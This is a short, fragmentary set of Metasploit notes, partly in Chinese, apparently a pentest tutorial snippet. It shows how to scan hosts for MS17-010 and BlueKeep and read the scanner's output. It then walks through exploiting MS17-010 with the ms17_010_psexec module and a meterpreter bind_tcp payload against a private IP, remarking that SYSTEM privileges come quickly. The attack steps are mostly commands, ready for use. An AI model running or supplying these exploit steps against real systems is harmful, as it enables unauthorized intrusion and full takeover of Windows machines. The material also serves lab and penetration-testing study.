use auxiliary/scanner/smb/smb_ms17_010 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep host likely vulnerable to MS17-010 #存在这个漏洞,可利用攻击 host does not appear vulnerable #不易受到攻击 / 不存在这个漏洞
use auxiliary/scanner/smb/smb_ms17_010 //判断漏洞 set rhosts 192.168.33.33 //设置ip地址 run 4.目标以确定开始攻击,啪的一下很快啊,就直接拿到system权限 use exploit/windows/smb/ms17_010_psexec //验证漏洞 set payload windows/meterpreter/bind_tcp //正向连接 set RHOSTS 192.168.33.33 //攻击目标 ...
msf > use auxiliary/scanner/smb/smb_version msf auxiliary(smb_version) > show options Module options: Name Current Setting Required Description --- --- --- --- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass ...